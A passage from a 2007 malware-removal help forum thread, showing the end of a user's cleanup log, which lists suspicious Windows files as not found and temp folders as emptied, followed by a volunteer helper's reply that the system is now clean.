File C:\WINDOWS\spupdsvc.exe not found!
File C:\WINDOWS\spupdsvcHook.dll not found!
File C:\WINDOWS\SYSTEM32\a.exe not found!
File C:\WINDOWS\SYSTEM32\iaxcfg32.dll not found!
File C:\WINDOWS\SYSTEM32\istjor.exe not found!
File C:\WINDOWS\SYSTEM32\ktzobo.exe not found!
File C:\WINDOWS\SYSTEM32\wmism23delete.exe not found!
[File String Scan - Non-Microsoft Only]
File C:\WINDOWS\spupdsvc.exe not found!
C:\WINDOWS\SYSTEM32\TFTP1296 moved successfully.
[Empty Temp Folders]
C:\DOCUME~1\THESTE~1\LOCALS~1\Temp\ -> emptied.
C:\Documents and Settings\The Stensberg's\Local Settings\Temporary Internet Files\Content.IE5\ -> emptied
RecycleBin -> emptied.
< End of log >
Created on 06/21/2007 17:05:42

#7 OldTimer

OldTimer

    Malware Expert


  • Members
  • 11,092 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:North Carolina
  • Local time:03:36 PM

Posted 23 June 2007 - 07:44 AM

Hi DigitalFool. Everything looks good in the log! You are good to go :thumbsup:

Cheers.

OT
I do not respond to PM's requesting help. That's what the forums are here for. Please use them so that others may benefit from your questions and the responses you receive.
OldTimer

Posted Image




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users